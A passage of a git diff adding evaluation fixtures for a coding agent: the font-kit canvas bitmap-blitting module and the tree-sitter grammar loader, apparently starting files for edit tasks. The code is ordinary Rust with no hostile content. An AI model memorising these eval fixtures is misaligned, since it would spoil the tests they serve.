+ fn blit_from_with( + &mut self, + rect: RectI, + src_bytes: &[u8], + src_stride: usize, + src_format: Format, + ) { + let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + + for y in 0..rect.height() { + let (dest_row_start, src_row_start) = ( + (y + rect.origin_y()) as usize * self.stride + + rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; + let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + B::blit(dest_row_pixels, src_row_pixels) + } + } +} + +impl fmt::Debug for Canvas { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.debug_struct("Canvas") + .field("pixels", &self.pixels.len()) // Do not dump a vector content. + .field("size", &self.size) + .field("stride", &self.stride) + .field("format", &self.format) + .finish() + } +} + +/// The image format for the canvas. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum Format { + /// Premultiplied R8G8B8A8, little-endian. + Rgba32, + /// R8G8B8, little-endian. + Rgb24, + /// A8. + A8, +} + +impl Format { + /// Returns the number of bits per pixel that this image format corresponds to. + #[inline] + pub fn bits_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 32, + Format::Rgb24 => 24, + Format::A8 => 8, + } + } + + /// Returns the number of color channels per pixel that this image format corresponds to. + #[inline] + pub fn components_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 4, + Format::Rgb24 => 3, + Format::A8 => 1, + } + } + + /// Returns the number of bits per color channel that this image format contains. 
+ #[inline] + pub fn bits_per_component(self) -> u8 { + self.bits_per_pixel() / self.components_per_pixel() + } + + /// Returns the number of bytes per pixel that this image format corresponds to. + #[inline] + pub fn bytes_per_pixel(self) -> u8 { + self.bits_per_pixel() / 8 + } +} + +/// The antialiasing strategy that should be used when rasterizing glyphs. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum RasterizationOptions { + /// "Black-and-white" rendering. Each pixel is either entirely on or off. + Bilevel, + /// Grayscale antialiasing. Only one channel is used. + GrayscaleAa, + /// Subpixel RGB antialiasing, for LCD screens. + SubpixelAa, +} + +trait Blit { + fn blit(dest: &mut [u8], src: &[u8]); +} + +struct BlitMemcpy; + +impl Blit for BlitMemcpy { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + dest.clone_from_slice(src) + } +} + +struct BlitRgb24ToA8; + +impl Blit for BlitRgb24ToA8 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. + for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { + *dest = src[1] + } + } +} + +struct BlitA8ToRgb24; + +impl Blit for BlitA8ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { + dest[0] = *src; + dest[1] = *src; + dest[2] = *src; + } + } +} + +struct BlitRgba32ToRgb24; + +impl Blit for BlitRgba32ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. 
+ for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { + dest.copy_from_slice(&src[0..3]) + } + } +} + +struct BlitRgb24ToRgba32; + +impl Blit for BlitRgb24ToRgba32 { + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { + dest[0] = src[0]; + dest[1] = src[1]; + dest[2] = src[2]; + dest[3] = 255; + } + } +} diff --git a/crates/agent/src/tools/evals/fixtures/translate_doc_comments/before.rs b/crates/agent/src/tools/evals/fixtures/translate_doc_comments/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..12590fe6e93dc61f5c319d650b637654c39707d3 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/translate_doc_comments/before.rs @@ -0,0 +1,339 @@ +// font-kit/src/canvas.rs +// +// Copyright © 2018 The Pathfinder Project Developers. +// +// Licensed under the Apache License, Version 2.0 or the MIT license +// , at your +// option. This file may not be copied, modified, or distributed +// except according to those terms. + +//! An in-memory bitmap surface for glyph rasterization. + +use lazy_static::lazy_static; +use pathfinder_geometry::rect::RectI; +use pathfinder_geometry::vector::Vector2I; +use std::cmp; +use std::fmt; + +use crate::utils; + +lazy_static! { + static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { + let mut lut = [[0; 8]; 256]; + for byte in 0..0x100 { + let mut value = [0; 8]; + for bit in 0..8 { + if (byte & (0x80 >> bit)) != 0 { + value[bit] = 0xff; + } + } + lut[byte] = value + } + lut + }; +} + +/// An in-memory bitmap surface for glyph rasterization. +pub struct Canvas { + /// The raw pixel data. + pub pixels: Vec, + /// The size of the buffer, in pixels. + pub size: Vector2I, + /// The number of *bytes* between successive rows. + pub stride: usize, + /// The image format of the canvas. + pub format: Format, +} + +impl Canvas { + /// Creates a new blank canvas with the given pixel size and format. + /// + /// Stride is automatically calculated from width. 
+ /// + /// The canvas is initialized with transparent black (all values 0). + #[inline] + pub fn new(size: Vector2I, format: Format) -> Canvas { + Canvas::with_stride( + size, + size.x() as usize * format.bytes_per_pixel() as usize, + format, + ) + } + + /// Creates a new blank canvas with the given pixel size, stride (number of bytes between + /// successive rows), and format. + /// + /// The canvas is initialized with transparent black (all values 0). + pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { + Canvas { + pixels: vec![0; stride * size.y() as usize], + size, + stride, + format, + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { + self.blit_from( + Vector2I::default(), + &src.pixels, + src.size, + src.stride, + src.format, + ) + } + + /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. + /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. + /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. + /// `src_stride` must be equal or larger than the actual data length. + #[allow(dead_code)] + pub(crate) fn blit_from( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + src_format: Format, + ) { + assert_eq!( + src_stride * src_size.y() as usize, + src_bytes.len(), + "Number of pixels in src_bytes does not match stride and size." 
+ ); + assert!( + src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, + "src_stride must be >= than src_size.x()" + ); + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + match (self.format, src_format) { + (Format::A8, Format::A8) + | (Format::Rgb24, Format::Rgb24) + | (Format::Rgba32, Format::Rgba32) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::A8, Format::Rgb24) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::A8) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::Rgba32) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::Rgb24) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_bitmap_1bpp( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + ) { + if self.format != Format::A8 { + unimplemented!() + } + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + let size = dst_rect.size(); + + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; + let src_row_stride = utils::div_round_up(size.x() as usize, 8); + + for y in 0..size.y() { + let (dest_row_start, src_row_start) = ( + (y + dst_rect.origin_y()) as usize * self.stride + + dst_rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + 
let dest_row_end = dest_row_start + dest_row_stride; + let src_row_end = src_row_start + src_row_stride; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + for x in 0..src_row_stride { + let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; + let dest_start = x * 8; + let dest_end = cmp::min(dest_start + 8, dest_row_stride); + let src = &pattern[0..(dest_end - dest_start)]; + dest_row_pixels[dest_start..dest_end].clone_from_slice(src); + } + } + } + + /// Blits to area `rect` using the data given in the buffer `src_bytes`. + /// `src_stride` must be specified in bytes. + /// The dimensions of `rect` must be in pixels. + fn blit_from_with( + &mut self, + rect: RectI, + src_bytes: &[u8], + src_stride: usize, + src_format: Format, + ) { + let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + + for y in 0..rect.height() { + let (dest_row_start, src_row_start) = ( + (y + rect.origin_y()) as usize * self.stride + + rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; + let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + B::blit(dest_row_pixels, src_row_pixels) + } + } +} + +impl fmt::Debug for Canvas { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + f.debug_struct("Canvas") + .field("pixels", &self.pixels.len()) // Do not dump a vector content. + .field("size", &self.size) + .field("stride", &self.stride) + .field("format", &self.format) + .finish() + } +} + +/// The image format for the canvas. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum Format { + /// Premultiplied R8G8B8A8, little-endian. 
+ Rgba32, + /// R8G8B8, little-endian. + Rgb24, + /// A8. + A8, +} + +impl Format { + /// Returns the number of bits per pixel that this image format corresponds to. + #[inline] + pub fn bits_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 32, + Format::Rgb24 => 24, + Format::A8 => 8, + } + } + + /// Returns the number of color channels per pixel that this image format corresponds to. + #[inline] + pub fn components_per_pixel(self) -> u8 { + match self { + Format::Rgba32 => 4, + Format::Rgb24 => 3, + Format::A8 => 1, + } + } + + /// Returns the number of bits per color channel that this image format contains. + #[inline] + pub fn bits_per_component(self) -> u8 { + self.bits_per_pixel() / self.components_per_pixel() + } + + /// Returns the number of bytes per pixel that this image format corresponds to. + #[inline] + pub fn bytes_per_pixel(self) -> u8 { + self.bits_per_pixel() / 8 + } +} + +/// The antialiasing strategy that should be used when rasterizing glyphs. +#[derive(Clone, Copy, Debug, PartialEq)] +pub enum RasterizationOptions { + /// "Black-and-white" rendering. Each pixel is either entirely on or off. + Bilevel, + /// Grayscale antialiasing. Only one channel is used. + GrayscaleAa, + /// Subpixel RGB antialiasing, for LCD screens. + SubpixelAa, +} + +trait Blit { + fn blit(dest: &mut [u8], src: &[u8]); +} + +struct BlitMemcpy; + +impl Blit for BlitMemcpy { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + dest.clone_from_slice(src) + } +} + +struct BlitRgb24ToA8; + +impl Blit for BlitRgb24ToA8 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. 
+ for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { + *dest = src[1] + } + } +} + +struct BlitA8ToRgb24; + +impl Blit for BlitA8ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { + dest[0] = *src; + dest[1] = *src; + dest[2] = *src; + } + } +} + +struct BlitRgba32ToRgb24; + +impl Blit for BlitRgba32ToRgb24 { + #[inline] + fn blit(dest: &mut [u8], src: &[u8]) { + // TODO(pcwalton): SIMD. + for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { + dest.copy_from_slice(&src[0..3]) + } + } +} + +struct BlitRgb24ToRgba32; + +impl Blit for BlitRgb24ToRgba32 { + fn blit(dest: &mut [u8], src: &[u8]) { + for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { + dest[0] = src[0]; + dest[1] = src[1]; + dest[2] = src[2]; + dest[3] = 255; + } + } +} diff --git a/crates/agent/src/tools/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs b/crates/agent/src/tools/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..cfa28fe1ad6091c9adda22f610e1cf13166f8dfb --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs @@ -0,0 +1,1629 @@ +#![doc = include_str!("../README.md")] +#![cfg_attr(docsrs, feature(doc_cfg))] + +#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] +use std::ops::Range; +#[cfg(feature = "tree-sitter-highlight")] +use std::sync::Mutex; +use std::{ + collections::HashMap, + env, + ffi::{OsStr, OsString}, + fs, + io::{BufRead, BufReader}, + mem, + path::{Path, PathBuf}, + process::Command, + sync::LazyLock, + time::SystemTime, +}; + +#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] +use anyhow::Error; +use anyhow::{Context as _, Result, anyhow}; +use etcetera::BaseStrategy as _; +use fs4::fs_std::FileExt; +use indoc::indoc; +use libloading::{Library, Symbol}; +use once_cell::unsync::OnceCell; +use 
path_slash::PathBufExt as _; +use regex::{Regex, RegexBuilder}; +use semver::Version; +use serde::{Deserialize, Deserializer, Serialize}; +use tree_sitter::Language; +#[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] +use tree_sitter::QueryError; +#[cfg(feature = "tree-sitter-highlight")] +use tree_sitter::QueryErrorKind; +#[cfg(feature = "tree-sitter-highlight")] +use tree_sitter_highlight::HighlightConfiguration; +#[cfg(feature = "tree-sitter-tags")] +use tree_sitter_tags::{Error as TagsError, TagsConfiguration}; +use url::Url; + +static GRAMMAR_NAME_REGEX: LazyLock = + LazyLock::new(|| Regex::new(r#""name":\s*"(.*?)""#).unwrap()); + +pub const EMSCRIPTEN_TAG: &str = concat!("docker.io/emscripten/emsdk:", env!("EMSCRIPTEN_VERSION")); + +#[derive(Default, Deserialize, Serialize)] +pub struct Config { + #[serde(default)] + #[serde( + rename = "parser-directories", + deserialize_with = "deserialize_parser_directories" + )] + pub parser_directories: Vec, +} + +#[derive(Serialize, Deserialize, Clone, Default)] +#[serde(untagged)] +pub enum PathsJSON { + #[default] + Empty, + Single(PathBuf), + Multiple(Vec), +} + +impl PathsJSON { + fn into_vec(self) -> Option> { + match self { + Self::Empty => None, + Self::Single(s) => Some(vec![s]), + Self::Multiple(s) => Some(s), + } + } + + const fn is_empty(&self) -> bool { + matches!(self, Self::Empty) + } +} + +#[derive(Serialize, Deserialize, Clone)] +#[serde(untagged)] +pub enum PackageJSONAuthor { + String(String), + Object { + name: String, + email: Option, + url: Option, + }, +} + +#[derive(Serialize, Deserialize, Clone)] +#[serde(untagged)] +pub enum PackageJSONRepository { + String(String), + Object { url: String }, +} + +#[derive(Serialize, Deserialize)] +pub struct PackageJSON { + pub name: String, + pub version: Version, + pub description: Option, + pub author: Option, + pub maintainers: Option>, + pub license: Option, + pub repository: Option, + #[serde(default)] + #[serde(rename = 
"tree-sitter", skip_serializing_if = "Option::is_none")] + pub tree_sitter: Option>, +} + +fn default_path() -> PathBuf { + PathBuf::from(".") +} + +#[derive(Serialize, Deserialize, Clone)] +#[serde(rename_all = "kebab-case")] +pub struct LanguageConfigurationJSON { + #[serde(default = "default_path")] + pub path: PathBuf, + pub scope: Option, + pub file_types: Option>, + pub content_regex: Option, + pub first_line_regex: Option, + pub injection_regex: Option, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub highlights: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub injections: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub locals: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub tags: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub external_files: PathsJSON, +} + +#[derive(Serialize, Deserialize)] +#[serde(rename_all = "kebab-case")] +pub struct TreeSitterJSON { + #[serde(rename = "$schema")] + pub schema: Option, + pub grammars: Vec, + pub metadata: Metadata, + #[serde(default)] + pub bindings: Bindings, +} + +impl TreeSitterJSON { + pub fn from_file(path: &Path) -> Result { + Ok(serde_json::from_str(&fs::read_to_string( + path.join("tree-sitter.json"), + )?)?) 
+ } + + #[must_use] + pub fn has_multiple_language_configs(&self) -> bool { + self.grammars.len() > 1 + } +} + +#[derive(Serialize, Deserialize)] +#[serde(rename_all = "kebab-case")] +pub struct Grammar { + pub name: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub camelcase: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, + pub scope: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub path: Option, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub external_files: PathsJSON, + pub file_types: Option>, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub highlights: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub injections: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub locals: PathsJSON, + #[serde(default, skip_serializing_if = "PathsJSON::is_empty")] + pub tags: PathsJSON, + #[serde(skip_serializing_if = "Option::is_none")] + pub injection_regex: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub first_line_regex: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub content_regex: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub class_name: Option, +} + +#[derive(Serialize, Deserialize)] +pub struct Metadata { + pub version: Version, + #[serde(skip_serializing_if = "Option::is_none")] + pub license: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub description: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub authors: Option>, + #[serde(skip_serializing_if = "Option::is_none")] + pub links: Option, + #[serde(skip)] + pub namespace: Option, +} + +#[derive(Serialize, Deserialize)] +pub struct Author { + pub name: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub email: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub url: Option, +} + +#[derive(Serialize, Deserialize)] +pub struct Links 
{ + pub repository: Url, + #[serde(skip_serializing_if = "Option::is_none")] + pub funding: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub homepage: Option, +} + +#[derive(Serialize, Deserialize)] +#[serde(default)] +pub struct Bindings { + pub c: bool, + pub go: bool, + #[serde(skip)] + pub java: bool, + #[serde(skip)] + pub kotlin: bool, + pub node: bool, + pub python: bool, + pub rust: bool, + pub swift: bool, + pub zig: bool, +} + +impl Default for Bindings { + fn default() -> Self { + Self { + c: true, + go: true, + java: false, + kotlin: false, + node: true, + python: true, + rust: true, + swift: true, + zig: false, + } + } +} + +// Replace `~` or `$HOME` with home path string. +// (While paths like "~/.tree-sitter/config.json" can be deserialized, +// they're not valid path for I/O modules.) +fn deserialize_parser_directories<'de, D>(deserializer: D) -> Result, D::Error> +where + D: Deserializer<'de>, +{ + let paths = Vec::::deserialize(deserializer)?; + let Ok(home) = etcetera::home_dir() else { + return Ok(paths); + }; + let standardized = paths + .into_iter() + .map(|path| standardize_path(path, &home)) + .collect(); + Ok(standardized) +} + +fn standardize_path(path: PathBuf, home: &Path) -> PathBuf { + if let Ok(p) = path.strip_prefix("~") { + return home.join(p); + } + if let Ok(p) = path.strip_prefix("$HOME") { + return home.join(p); + } + path +} + +impl Config { + #[must_use] + pub fn initial() -> Self { + let home_dir = etcetera::home_dir().expect("Cannot determine home directory"); + Self { + parser_directories: vec![ + home_dir.join("github"), + home_dir.join("src"), + home_dir.join("source"), + home_dir.join("projects"), + home_dir.join("dev"), + home_dir.join("git"), + ], + } + } +} + +const BUILD_TARGET: &str = env!("BUILD_TARGET"); +const BUILD_HOST: &str = env!("BUILD_HOST"); + +pub struct LanguageConfiguration<'a> { + pub scope: Option, + pub content_regex: Option, + pub first_line_regex: Option, + pub injection_regex: 
Option, + pub file_types: Vec, + pub root_path: PathBuf, + pub highlights_filenames: Option>, + pub injections_filenames: Option>, + pub locals_filenames: Option>, + pub tags_filenames: Option>, + pub language_name: String, + language_id: usize, + #[cfg(feature = "tree-sitter-highlight")] + highlight_config: OnceCell>, + #[cfg(feature = "tree-sitter-tags")] + tags_config: OnceCell>, + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: &'a Mutex>, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: bool, +} + +pub struct Loader { + pub parser_lib_path: PathBuf, + languages_by_id: Vec<(PathBuf, OnceCell, Option>)>, + language_configurations: Vec>, + language_configuration_ids_by_file_type: HashMap>, + language_configuration_in_current_path: Option, + language_configuration_ids_by_first_line_regex: HashMap>, + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: Box>>, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: bool, + debug_build: bool, + sanitize_build: bool, + force_rebuild: bool, + + #[cfg(feature = "wasm")] + wasm_store: Mutex>, +} + +pub struct CompileConfig<'a> { + pub src_path: &'a Path, + pub header_paths: Vec<&'a Path>, + pub parser_path: PathBuf, + pub scanner_path: Option, + pub external_files: Option<&'a [PathBuf]>, + pub output_path: Option, + pub flags: &'a [&'a str], + pub sanitize: bool, + pub name: String, +} + +impl<'a> CompileConfig<'a> { + #[must_use] + pub fn new( + src_path: &'a Path, + externals: Option<&'a [PathBuf]>, + output_path: Option, + ) -> Self { + Self { + src_path, + header_paths: vec![src_path], + parser_path: src_path.join("parser.c"), + scanner_path: None, + external_files: externals, + output_path, + flags: &[], + sanitize: false, + name: String::new(), + } + } +} + +unsafe impl Sync for Loader {} + +impl Loader { + pub fn new() -> Result { + let parser_lib_path = if let Ok(path) = env::var("TREE_SITTER_LIBDIR") { + PathBuf::from(path) + } else { + if cfg!(target_os 
= "macos") { + let legacy_apple_path = etcetera::base_strategy::Apple::new()? + .cache_dir() // `$HOME/Library/Caches/` + .join("tree-sitter"); + if legacy_apple_path.exists() && legacy_apple_path.is_dir() { + std::fs::remove_dir_all(legacy_apple_path)?; + } + } + + etcetera::choose_base_strategy()? + .cache_dir() + .join("tree-sitter") + .join("lib") + }; + Ok(Self::with_parser_lib_path(parser_lib_path)) + } + + #[must_use] + pub fn with_parser_lib_path(parser_lib_path: PathBuf) -> Self { + Self { + parser_lib_path, + languages_by_id: Vec::new(), + language_configurations: Vec::new(), + language_configuration_ids_by_file_type: HashMap::new(), + language_configuration_in_current_path: None, + language_configuration_ids_by_first_line_regex: HashMap::new(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: Box::new(Mutex::new(Vec::new())), + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: true, + debug_build: false, + sanitize_build: false, + force_rebuild: false, + + #[cfg(feature = "wasm")] + wasm_store: Mutex::default(), + } + } + + #[cfg(feature = "tree-sitter-highlight")] + #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] + pub fn configure_highlights(&mut self, names: &[String]) { + self.use_all_highlight_names = false; + let mut highlights = self.highlight_names.lock().unwrap(); + highlights.clear(); + highlights.extend(names.iter().cloned()); + } + + #[must_use] + #[cfg(feature = "tree-sitter-highlight")] + #[cfg_attr(docsrs, doc(cfg(feature = "tree-sitter-highlight")))] + pub fn highlight_names(&self) -> Vec { + self.highlight_names.lock().unwrap().clone() + } + + pub fn find_all_languages(&mut self, config: &Config) -> Result<()> { + if config.parser_directories.is_empty() { + eprintln!("Warning: You have not configured any parser directories!"); + eprintln!("Please run `tree-sitter init-config` and edit the resulting"); + eprintln!("configuration file to indicate where we should look for"); + 
eprintln!("language grammars.\n"); + } + for parser_container_dir in &config.parser_directories { + if let Ok(entries) = fs::read_dir(parser_container_dir) { + for entry in entries { + let entry = entry?; + if let Some(parser_dir_name) = entry.file_name().to_str() { + if parser_dir_name.starts_with("tree-sitter-") { + self.find_language_configurations_at_path( + &parser_container_dir.join(parser_dir_name), + false, + ) + .ok(); + } + } + } + } + } + Ok(()) + } + + pub fn languages_at_path(&mut self, path: &Path) -> Result> { + if let Ok(configurations) = self.find_language_configurations_at_path(path, true) { + let mut language_ids = configurations + .iter() + .map(|c| (c.language_id, c.language_name.clone())) + .collect::>(); + language_ids.sort_unstable(); + language_ids.dedup(); + language_ids + .into_iter() + .map(|(id, name)| Ok((self.language_for_id(id)?, name))) + .collect::>>() + } else { + Ok(Vec::new()) + } + } + + #[must_use] + pub fn get_all_language_configurations(&self) -> Vec<(&LanguageConfiguration, &Path)> { + self.language_configurations + .iter() + .map(|c| (c, self.languages_by_id[c.language_id].0.as_ref())) + .collect() + } + + pub fn language_configuration_for_scope( + &self, + scope: &str, + ) -> Result> { + for configuration in &self.language_configurations { + if configuration.scope.as_ref().is_some_and(|s| s == scope) { + let language = self.language_for_id(configuration.language_id)?; + return Ok(Some((language, configuration))); + } + } + Ok(None) + } + + pub fn language_configuration_for_first_line_regex( + &self, + path: &Path, + ) -> Result> { + self.language_configuration_ids_by_first_line_regex + .iter() + .try_fold(None, |_, (regex, ids)| { + if let Some(regex) = Self::regex(Some(regex)) { + let file = fs::File::open(path)?; + let reader = BufReader::new(file); + let first_line = reader.lines().next().transpose()?; + if let Some(first_line) = first_line { + if regex.is_match(&first_line) && !ids.is_empty() { + let configuration = 
&self.language_configurations[ids[0]]; + let language = self.language_for_id(configuration.language_id)?; + return Ok(Some((language, configuration))); + } + } + } + + Ok(None) + }) + } + + pub fn language_configuration_for_file_name( + &self, + path: &Path, + ) -> Result> { + // Find all the language configurations that match this file name + // or a suffix of the file name. + let configuration_ids = path + .file_name() + .and_then(|n| n.to_str()) + .and_then(|file_name| self.language_configuration_ids_by_file_type.get(file_name)) + .or_else(|| { + let mut path = path.to_owned(); + let mut extensions = Vec::with_capacity(2); + while let Some(extension) = path.extension() { + extensions.push(extension.to_str()?.to_string()); + path = PathBuf::from(path.file_stem()?.to_os_string()); + } + extensions.reverse(); + self.language_configuration_ids_by_file_type + .get(&extensions.join(".")) + }); + + if let Some(configuration_ids) = configuration_ids { + if !configuration_ids.is_empty() { + let configuration = if configuration_ids.len() == 1 { + &self.language_configurations[configuration_ids[0]] + } + // If multiple language configurations match, then determine which + // one to use by applying the configurations' content regexes. + else { + let file_contents = fs::read(path) + .with_context(|| format!("Failed to read path {}", path.display()))?; + let file_contents = String::from_utf8_lossy(&file_contents); + let mut best_score = -2isize; + let mut best_configuration_id = None; + for configuration_id in configuration_ids { + let config = &self.language_configurations[*configuration_id]; + + // If the language configuration has a content regex, assign + // a score based on the length of the first match. 
+ let score; + if let Some(content_regex) = &config.content_regex { + if let Some(mat) = content_regex.find(&file_contents) { + score = (mat.end() - mat.start()) as isize; + } + // If the content regex does not match, then *penalize* this + // language configuration, so that language configurations + // without content regexes are preferred over those with + // non-matching content regexes. + else { + score = -1; + } + } else { + score = 0; + } + if score > best_score { + best_configuration_id = Some(*configuration_id); + best_score = score; + } + } + + &self.language_configurations[best_configuration_id.unwrap()] + }; + + let language = self.language_for_id(configuration.language_id)?; + return Ok(Some((language, configuration))); + } + } + + Ok(None) + } + + pub fn language_configuration_for_injection_string( + &self, + string: &str, + ) -> Result> { + let mut best_match_length = 0; + let mut best_match_position = None; + for (i, configuration) in self.language_configurations.iter().enumerate() { + if let Some(injection_regex) = &configuration.injection_regex { + if let Some(mat) = injection_regex.find(string) { + let length = mat.end() - mat.start(); + if length > best_match_length { + best_match_position = Some(i); + best_match_length = length; + } + } + } + } + + if let Some(i) = best_match_position { + let configuration = &self.language_configurations[i]; + let language = self.language_for_id(configuration.language_id)?; + Ok(Some((language, configuration))) + } else { + Ok(None) + } + } + + pub fn language_for_configuration( + &self, + configuration: &LanguageConfiguration, + ) -> Result { + self.language_for_id(configuration.language_id) + } + + fn language_for_id(&self, id: usize) -> Result { + let (path, language, externals) = &self.languages_by_id[id]; + language + .get_or_try_init(|| { + let src_path = path.join("src"); + self.load_language_at_path(CompileConfig::new( + &src_path, + externals.as_deref(), + None, + )) + }) + .cloned() + } + + pub fn 
compile_parser_at_path( + &self, + grammar_path: &Path, + output_path: PathBuf, + flags: &[&str], + ) -> Result<()> { + let src_path = grammar_path.join("src"); + let mut config = CompileConfig::new(&src_path, None, Some(output_path)); + config.flags = flags; + self.load_language_at_path(config).map(|_| ()) + } + + pub fn load_language_at_path(&self, mut config: CompileConfig) -> Result { + let grammar_path = config.src_path.join("grammar.json"); + config.name = Self::grammar_json_name(&grammar_path)?; + self.load_language_at_path_with_name(config) + } + + pub fn load_language_at_path_with_name(&self, mut config: CompileConfig) -> Result { + let mut lib_name = config.name.to_string(); + let language_fn_name = format!( + "tree_sitter_{}", + replace_dashes_with_underscores(&config.name) + ); + if self.debug_build { + lib_name.push_str(".debug._"); + } + + if self.sanitize_build { + lib_name.push_str(".sanitize._"); + config.sanitize = true; + } + + if config.output_path.is_none() { + fs::create_dir_all(&self.parser_lib_path)?; + } + + let mut recompile = self.force_rebuild || config.output_path.is_some(); // if specified, always recompile + + let output_path = config.output_path.unwrap_or_else(|| { + let mut path = self.parser_lib_path.join(lib_name); + path.set_extension(env::consts::DLL_EXTENSION); + #[cfg(feature = "wasm")] + if 